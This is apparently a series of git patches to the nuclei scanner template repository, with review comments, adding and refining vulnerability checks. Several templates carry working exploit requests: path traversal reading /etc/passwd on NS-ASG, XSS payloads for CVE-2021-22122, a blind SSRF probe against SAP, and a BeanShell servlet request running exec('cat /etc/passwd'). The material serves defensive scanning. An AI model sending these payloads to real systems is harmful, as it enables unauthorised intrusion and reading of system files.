d5b9e4c7b6262e634b5d338eda9dc395abc77d27 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 1 Jun 2021 14:09:01 +0530 Subject: [PATCH 073/144] Update ns-asg-file-read.yaml --- vulnerabilities/other/ns-asg-file-read.yaml | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/vulnerabilities/other/ns-asg-file-read.yaml b/vulnerabilities/other/ns-asg-file-read.yaml index 8fb79f6637..66e112d2de 100644 --- a/vulnerabilities/other/ns-asg-file-read.yaml 
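Review bot: Both raw requests are always sent, so the `ipconfig` payload is still executed on a Linux host that already answered the first probe with `/etc/passwd` contents; add `stop-at-first-match: true` under the request so the scan stops once one OS-specific probe matches. The `Windows IP` regex is loose for a body match, and `Windows IP Configuration`, the literal banner `ipconfig` prints, is less likely to occur in unrelated pages. The template has no `description:`, and the two blank `+` lines after the status matcher are trailing whitespace.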
+++ b/vulnerabilities/other/ns-asg-file-read.yaml @@ -1,16 +1,14 @@ -id: ns-asg-file-read +id: nsasg-arbitrary-file-read info: - name: NS ASG File Read + name: NS ASG Arbitrary File Read author: pikpikcu severity: high - reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md - tags: ns-asg,lfi + tags: nsasg,lfi requests: - method: GET path: - - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php" - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd" matchers-condition: and @@ -19,7 +17,6 @@ requests: - type: regex regex: - "root:[x*]:0:0" - - "$certfile" - type: status status: From 02a337278adea19af8baf4679abd00ea0bee29d0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 1 Jun 2021 08:40:28 +0000 Subject: [PATCH 074/144] Auto Update README [Tue Jun 1 08:40:28 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 3462c2d10f..b986e760fe 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 325 | vulnerabilities | 175 | exposed-panels | 143 | +| cves | 325 | vulnerabilities | 176 | exposed-panels | 143 | | takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1187 files**. +**110 directories, 1188 files**. 
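Review bot: The first hunk removes the only `reference:` line along with the control request, leaving nsasg-arbitrary-file-read with no reference at all; keep a reference entry (the original wiki URL is still valid as one) so the finding can be traced back. Dropping the `$certfile` regex in the second hunk is right, since that literal could never appear in the returned file. The `- type: status` matcher continues outside the second hunk.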
From 3375e16caaa88a359434bc7a96744e8fe51ac546 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 1 Jun 2021 14:39:59 +0530 Subject: [PATCH 075/144] Added zenario-login-panel --- exposed-panels/zenario-login-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/zenario-login-panel.yaml diff --git a/exposed-panels/zenario-login-panel.yaml b/exposed-panels/zenario-login-panel.yaml new file mode 100644 index 0000000000..817bcf573f --- /dev/null +++ b/exposed-panels/zenario-login-panel.yaml @@ -0,0 +1,22 @@ +id: zenario-login-panel + +info: + name: Zenario Admin login + author: __Fazal + severity: info + tags: panel,zenario + +requests: + - method: GET + path: + - '{{BaseURL}}/zenario/admin/welcome.php' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Welcome to Zenario" From 5f834ffdf9ff4c592e2aeb8a1c444b4c8a01f9f0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 1 Jun 2021 09:11:41 +0000 Subject: [PATCH 076/144] Auto Update README [Tue Jun 1 09:11:41 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b986e760fe..1c0cd31d73 100644 --- a/README.md +++ b/README.md 
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 325 | vulnerabilities | 176 | exposed-panels | 143 | +| cves | 325 | vulnerabilities | 176 | exposed-panels | 144 | | takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1188 files**. +**110 directories, 1189 files**. From a5ccb5f893c0ead456b4e2f70c3bede1d8d002d9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 1 Jun 2021 16:08:41 +0530 Subject: [PATCH 077/144] strict matcher --- .../other/hjtcloud-rest-arbitrary-file-read.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml index a19bed8900..6641fa4b62 100644 --- a/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml +++ b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml @@ -17,10 +17,17 @@ requests: - type: word words: - - "name" - - "length" - - "filePath" + - '"name":' + - '"length":' + - '"filePath":' + - '"list":' condition: and + part: body + + - type: word + words: + - "application/json" + part: header - type: status status: From 9f8852572e3c7589ac7af5eaddf0236332854e43 Mon Sep 17 00:00:00 2001 
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 1 Jun 2021 10:53:26 +0000 Subject: [PATCH 078/144] Create alibaba-mongoshake-unauth.yaml --- .../alibaba-mongoshake-unauth.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 misconfiguration/alibaba-mongoshake-unauth.yaml diff --git a/misconfiguration/alibaba-mongoshake-unauth.yaml b/misconfiguration/alibaba-mongoshake-unauth.yaml new file mode 100644 index 0000000000..83af0df25a --- /dev/null +++ b/misconfiguration/alibaba-mongoshake-unauth.yaml @@ -0,0 +1,29 @@ +id: alibaba-mongoshake-unauth + +info: + name: Alibaba Mongoshake Unauth + author: pikpikcu + severity: info + tags: mongoshake,unauth + +requests: + - method: GET + path: + - '{{BaseURL}}/conf' + - '{{BaseURL}}/worker' + - '{{BaseURL}}/repl' + + matchers-condition: and + matchers: + + - type: word + words: + - 'MongoUrls' + - 'worker_id' + - 'jobs_in_queue' + - 'logs_repl' + - 'who' + + - type: status + status: + - 200 From 5d083f1124e8798ab602dd6cc5146b7b5b84287a Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 1 Jun 2021 09:07:39 -0500 Subject: [PATCH 079/144] Create detect-drone-config.yaml --- exposures/configs/detect-drone-config.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/configs/detect-drone-config.yaml diff --git a/exposures/configs/detect-drone-config.yaml b/exposures/configs/detect-drone-config.yaml new file mode 100644 index 0000000000..68cc1afdd1 --- /dev/null +++ b/exposures/configs/detect-drone-config.yaml 
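Review bot: The word matcher lists `MongoUrls`, `worker_id`, `jobs_in_queue`, `logs_repl` and `who` without a `condition:`, so the default `or` applies and any 200 page that merely contains the word `who` is reported as an exposed MongoShake instance. Give each of the three endpoints a term that only it returns and add `condition: and`, or use one matcher per path; patch 084 further down this page replaces the list with a single exact JSON string plus a `text/plain` header check, which is the stricter form. A `description:` naming what the `/conf`, `/worker` and `/repl` endpoints disclose would also help triage.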
@@ -0,0 +1,25 @@ +id: detect-drone-config + +info: + name: Detect Drone Configuration + author: geeknik + description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone + severity: high + tags: config,exposure,auth + +requests: + - method: GET + path: + - "{{BaseURL}}/.drone.yml" + + matchers-condition: and + matchers: + - type: word + words: + - "services:" + - "environment:" + - "commands:" + condition: and + - type: status + status: + - 200 From d949ad7520981f54f5864894f78cd24c573628b8 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 1 Jun 2021 18:22:05 +0000 Subject: [PATCH 080/144] Update general-tokens.yaml fix another false positive --- exposures/tokens/generic/general-tokens.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/tokens/generic/general-tokens.yaml b/exposures/tokens/generic/general-tokens.yaml index 157c304f03..d2fc17a7a6 100644 --- a/exposures/tokens/generic/general-tokens.yaml +++ b/exposures/tokens/generic/general-tokens.yaml @@ -26,6 +26,8 @@ requests: part: body regex: - (K|k)ey(up|down|press) + - (K|k)eyboard(N|n)avigation + condition: or negative: true extractors: From 259eb048ccc74ec5c9de41203b2000d28f29e41e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Jun 2021 00:33:22 +0530 Subject: [PATCH 081/144] Update detect-drone-config.yaml --- exposures/configs/detect-drone-config.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/configs/detect-drone-config.yaml b/exposures/configs/detect-drone-config.yaml index 68cc1afdd1..ee206c7f59 100644 --- a/exposures/configs/detect-drone-config.yaml +++ b/exposures/configs/detect-drone-config.yaml @@ -16,9 +16,9 @@ requests: matchers: - type: word words: - - "services:" - - "environment:" - - "commands:" + - "kind:" + - "name:" + - "steps:" condition: and - type: status status: From cdf6cdf6386d5d46436d44547e5b50ebf7513fd8 Mon Sep 17 00:00:00 2001 
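Review bot: The replacement words `kind:`, `name:` and `steps:` are generic YAML keys that a Kubernetes manifest or a GitHub workflow also carries, so any YAML served at `/.drone.yml` that is not a Drone pipeline still satisfies the `condition: and` check. Drone 1.x pipelines declare `kind: pipeline`, so `- "kind: pipeline"` in place of `- "kind:"` keeps the match specific to Drone while still covering the new syntax; the `services:`/`environment:`/`commands:` set from patch 079 presumably only matched legacy 0.x pipelines, which is why it was replaced. The `- type: status` matcher continues outside the hunk.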
From: Prince Chaddha Date: Wed, 2 Jun 2021 00:38:33 +0530 Subject: [PATCH 082/144] Update detect-drone-config.yaml --- exposures/configs/detect-drone-config.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/detect-drone-config.yaml b/exposures/configs/detect-drone-config.yaml index ee206c7f59..01384c4d0a 100644 --- a/exposures/configs/detect-drone-config.yaml +++ b/exposures/configs/detect-drone-config.yaml @@ -5,7 +5,7 @@ info: author: geeknik description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone severity: high - tags: config,exposure,auth + tags: config,exposure,drone requests: - method: GET From 780634da513ff1b373897f8e33bdc634c6350c99 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 1 Jun 2021 19:30:18 +0000 Subject: [PATCH 083/144] Auto Update README [Tue Jun 1 19:30:18 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1c0cd31d73..5616d1ec3b 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 325 | vulnerabilities | 176 | exposed-panels | 144 | -| takeovers | 67 | exposures | 105 | technologies | 97 | +| takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1189 files**. +**110 directories, 1190 files**. From f63cd48c790a837dc5c0aa83b9602fa4aeec5f0c Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Wed, 2 Jun 2021 01:16:41 +0530 Subject: [PATCH 084/144] Update alibaba-mongoshake-unauth.yaml --- misconfiguration/alibaba-mongoshake-unauth.yaml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/misconfiguration/alibaba-mongoshake-unauth.yaml b/misconfiguration/alibaba-mongoshake-unauth.yaml index 83af0df25a..6de46b6ec7 100644 --- a/misconfiguration/alibaba-mongoshake-unauth.yaml +++ b/misconfiguration/alibaba-mongoshake-unauth.yaml @@ -9,20 +9,18 @@ info: requests: - method: GET path: - - '{{BaseURL}}/conf' - - '{{BaseURL}}/worker' - - '{{BaseURL}}/repl' + - '{{BaseURL}}/' matchers-condition: and matchers: - type: word words: - - 'MongoUrls' - - 'worker_id' - - 'jobs_in_queue' - - 'logs_repl' - - 'who' + - '{"Uri":"/worker","Method":"GET"}' + - type: word + words: + - 'text/plain' + part: header - type: status status: From f05668635effb2de35f49dfab7fd1022d8d7800b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 1 Jun 2021 19:49:34 +0000 Subject: [PATCH 085/144] Auto Update README [Tue Jun 1 19:49:34 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 5616d1ec3b..492cfc0947 100644 --- a/README.md +++ b/README.md @@ -40,11 +40,11 @@ An overview of the nuclei template directory including number of templates assoc | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 325 | vulnerabilities | 176 | exposed-panels | 144 | | takeovers | 67 | exposures | 106 | technologies | 97 | -| misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | +| misconfiguration | 67 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1190 files**. +**110 directories, 1191 files**. 
From 26787211746f5ebf00ce4471cb9940311c664bc4 Mon Sep 17 00:00:00 2001 From: root Date: Wed, 2 Jun 2021 00:06:20 +0100 Subject: [PATCH 086/144] Added new path for CVE-2021-22122.yaml --- cves/2021/CVE-2021-22122.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml index 60c70d0949..b7023eb868 100644 --- a/cves/2021/CVE-2021-22122.yaml +++ b/cves/2021/CVE-2021-22122.yaml @@ -23,6 +23,7 @@ requests: - method: GET path: - "{{BaseURL}}/error3?msg=30&data=';alert('nuclei');//" + - "{{BaseURL}}/omni_success?cmdb_edit_path=");alert('nuclei');//" matchers-condition: and matchers: - type: word @@ -30,4 +31,4 @@ requests: - "nuclei" - "No policy has been chosen." condition: and - part: body \ No newline at end of file + part: body From 63723211319130cca517b8f5d8fee0b01ec960d0 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Wed, 2 Jun 2021 11:30:05 +0900 Subject: [PATCH 087/144] Create odoo-openredirect.yaml --- odoo-openredirect.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 odoo-openredirect.yaml diff --git a/odoo-openredirect.yaml b/odoo-openredirect.yaml new file mode 100644 index 0000000000..57bf18074e --- /dev/null +++ b/odoo-openredirect.yaml @@ -0,0 +1,20 @@ +id: Odoo-CMS-Open-redirection + +info: + name: Odoo CMS - Open redirection all Version + author: 0x_Akoko + description: Odoo CMS - Open redirection all Version. + reference: https://cxsecurity.com/issue/WLB-2021020143 + severity: low + tags: odoo,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/website/lang/en_US?r=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From f28fdf610bf3b9be4c1dd3598d97d0e47e1c2bb3 Mon Sep 17 00:00:00 2001 
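Review bot: The new path `- "{{BaseURL}}/omni_success?cmdb_edit_path=");alert('nuclei');//"` contains an unescaped `"` inside a double-quoted scalar, which ends the string early and makes CVE-2021-22122.yaml fail to parse. Escape it as `\"` or switch the entry to single quotes, which is what patch 092 later on this page does; the second hunk, which only adds the missing final newline, is fine.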
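Review bot: The Location regex in odoo-openredirect.yaml makes the scheme optional with `(?:https?://|//)?` and then allows any `[a-zA-Z0-9\-_\.@]*` prefix, so a relative redirect such as `Location: /shop?next=example.com` is counted as an open redirect although the browser stays on the target; make the scheme mandatory, `'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'`. The `id: Odoo-CMS-Open-redirection` breaks the lowercase kebab-case used by every other id on this page (patch 090 renames it), and the `description:` only repeats the name; a sentence on how the `r` parameter of `/website/lang/` is reflected into the redirect would be more useful.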
From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 2 Jun 2021 11:39:27 +0530 Subject: [PATCH 088/144] Create CVE-2020-6308.yaml --- cves/2020/CVE-2020-6308.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cves/2020/CVE-2020-6308.yaml diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml new file mode 100644 index 0000000000..a9d1af9ed2 --- /dev/null +++ b/cves/2020/CVE-2020-6308.yaml @@ -0,0 +1,22 @@ +id: CVE-2020-6308 + +info: + name: Unauthenticated Blind SSRF in SAP + author: madrobot + severity: medium + description: https://github.com/InitRoot/CVE-2020-6308-PoC + tags: cve,cve2020,sap,ssrf + +requests: + - method: POST + path: + - '{{BaseURL}}/AdminTools/querybuilder/logon?framework=' + - '{{BaseURL}}:8080/AdminTools/querybuilder/logon?framework=' + + body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp + + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" From e3f42066bfd16ec5d708dedad601340b8cd21d37 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 2 Jun 2021 09:39:35 +0300 Subject: [PATCH 089/144] Spelling --- cves/2020/CVE-2020-36112.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml index 4969235916..142c4a081a 100644 --- a/cves/2020/CVE-2020-36112.yaml +++ b/cves/2020/CVE-2020-36112.yaml 
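Review bot: The second path `'{{BaseURL}}:8080/AdminTools/querybuilder/logon?framework='` appends a port to `{{BaseURL}}`, which already holds scheme, host and, when the input carries one, a port, so an input like `https://host:443` presumably turns into `https://host:443:8080`; build the alternative from `{{Hostname}}` instead, or leave port selection to the target list. `description:` holds only the PoC URL — move it under `reference:` and write a sentence describing the unauthenticated blind SSRF through the `aps` parameter of the AdminTools logon. The `usr=admin&pwd=admin` values in the body play no part in the matcher, which keys solely on the `dns` interaction, so a short comment marking them as placeholders would avoid the impression that default credentials are required.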
@@ -3,7 +3,7 @@ id: CVE-2020-36112 info: name: CSE Bookstore 1.0 SQL Injection author: geeknik - description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database. + description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database. reference: | - https://www.exploit-db.com/exploits/49314 - https://www.tenable.com/cve/CVE-2020-36112 From 2fe2c88872869d1000807058d2266e04fa9f7523 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 2 Jun 2021 12:22:24 +0530 Subject: [PATCH 090/144] Moving files around --- .../other/odoo-cms-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename odoo-openredirect.yaml => vulnerabilities/other/odoo-cms-redirect.yaml (94%) diff --git a/odoo-openredirect.yaml b/vulnerabilities/other/odoo-cms-redirect.yaml similarity index 94% rename from odoo-openredirect.yaml rename to vulnerabilities/other/odoo-cms-redirect.yaml index 57bf18074e..9ccd8e1d01 100644 --- a/odoo-openredirect.yaml +++ b/vulnerabilities/other/odoo-cms-redirect.yaml @@ -1,4 +1,4 @@ -id: Odoo-CMS-Open-redirection +id: odoo-cms-redirect info: name: Odoo CMS - Open redirection all Version From a3d956e0a037f3bccbe8795ba58d60c895e9cc06 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 2 Jun 2021 06:54:34 +0000 Subject: [PATCH 091/144] Auto Update README [Wed Jun 2 06:54:34 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 492cfc0947..1b5f3c8e91 100644 --- a/README.md +++ b/README.md 
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 325 | vulnerabilities | 176 | exposed-panels | 144 | +| cves | 325 | vulnerabilities | 177 | exposed-panels | 144 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 67 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1191 files**. +**110 directories, 1192 files**. From 5269cc1c877140f3915f27146f8ded1dc0648313 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Jun 2021 13:17:00 +0530 Subject: [PATCH 092/144] Update CVE-2021-22122.yaml --- cves/2021/CVE-2021-22122.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml index b7023eb868..213b811b3d 100644 --- a/cves/2021/CVE-2021-22122.yaml +++ b/cves/2021/CVE-2021-22122.yaml @@ -23,7 +23,7 @@ requests: - method: GET path: - "{{BaseURL}}/error3?msg=30&data=';alert('nuclei');//" - - "{{BaseURL}}/omni_success?cmdb_edit_path=");alert('nuclei');//" + - "{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('nuclei');//" matchers-condition: and matchers: - type: word From 7fac0067d016ba7e717a58335570214a84ac7eb7 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 2 Jun 2021 13:38:17 +0530 Subject: [PATCH 093/144] Additional paths for Telerik Web UI --- .../telerik-dialoghandler-detect.yaml | 27 ++++++++++++++----- 1 file changed, 20 insertions(+), 7 deletions(-) diff --git a/technologies/telerik-dialoghandler-detect.yaml b/technologies/telerik-dialoghandler-detect.yaml index c980e077e1..55311b4bd0 100644 
--- a/technologies/telerik-dialoghandler-detect.yaml +++ b/technologies/telerik-dialoghandler-detect.yaml 
@@ -4,17 +4,30 @@ info: name: Detect Telerik Web UI Dialog Handler author: organiccrap & zhenwarx severity: info - reference: https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html + reference: | + - https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html + - https://github.com/bao7uo/dp_crypto tags: telerik,asp requests: - method: GET path: - - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx' - - '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/telerik.web.ui.dialoghandler.aspx' - - '{{BaseURL}}/providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx' - - '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx' - - '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx' + - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1' + - '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1' + - '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1' + - '{{BaseURL}}/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - 
'{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1' + - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1' matchers-condition: and matchers: @@ -23,4 +36,4 @@ requests: - 200 - type: word words: - - Loading the dialog... + - 'Invalid length for a Base-64 char array' From f4b56b55e668b29768ef11dc9bf1f29e945674cb Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 2 Jun 2021 19:37:32 +0700 Subject: [PATCH 094/144] Update nc-bsh-servlet-rce.yaml --- vulnerabilities/other/nc-bsh-servlet-rce.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/nc-bsh-servlet-rce.yaml b/vulnerabilities/other/nc-bsh-servlet-rce.yaml index 0aa2f0ee04..295ceae036 100644 --- a/vulnerabilities/other/nc-bsh-servlet-rce.yaml +++ b/vulnerabilities/other/nc-bsh-servlet-rce.yaml @@ -14,7 +14,7 @@ requests: Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - + bsh.script=exec("cat /etc/passwd"); - | #windows @@ -22,9 +22,8 @@ requests: Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - - bsh.script=exec("ipconfig"); + bsh.script=exec("ipconfig"); matchers-condition: and matchers: From 1083d160b1437b8268ec7f22074845969f045744 Mon Sep 17 00:00:00 2001 From: Pramod Sargar <41449799+impramodsargar@users.noreply.github.com> Date: Wed, 2 Jun 2021 19:21:52 +0530 Subject: [PATCH 095/144] dotCMS admin panel added --- exposed-panels/dotcms-admin-panel.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposed-panels/dotcms-admin-panel.yaml diff --git a/exposed-panels/dotcms-admin-panel.yaml b/exposed-panels/dotcms-admin-panel.yaml new file mode 100644 index 0000000000..d873386ea3 
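Review bot: The last added path, `'{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'`, looks like two entries fused during editing: a handler `.aspx` is immediately followed by a second handler path. If that is what happened, splitting it into `- '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx?dp=1'` and `- '{{BaseURL}}/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'` restores both probes. The `requests:` block continues past this hunk into the matcher hunk that follows.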
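Review bot: The replacement word matcher keys detection on the .NET exception text `Invalid length for a Base-64 char array`, which the `?dp=1` parameter added in the previous hunk provokes; framework exception messages of this kind are localized on servers installed with a non-English culture, so such hosts may go undetected with no other signal left in the template. It is worth confirming the string against a non-English installation and, if it varies, pairing it with a locale-independent indicator under `condition: or`. The matcher list also belongs to a `requests:` entry that starts outside this hunk.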
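Review bot: In the second hunk of nc-bsh-servlet-rce.yaml (`@@ -22,9 +22,8 @@`) the counts show two removals and one addition: the blank line after `Content-Type: application/x-www-form-urlencoded` is removed together with the body line, and only `bsh.script=exec("ipconfig");` is added back. Unless a blank line survived that this collapsed view does not show, the raw request has lost its header/body separator and the Windows body is sent as a malformed header line rather than as the body. The first hunk keeps its separator (the whitespace-only line replaced by an empty one), so the second request should end up with the same shape: `Content-Type` line, empty line, then `bsh.script=...`.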
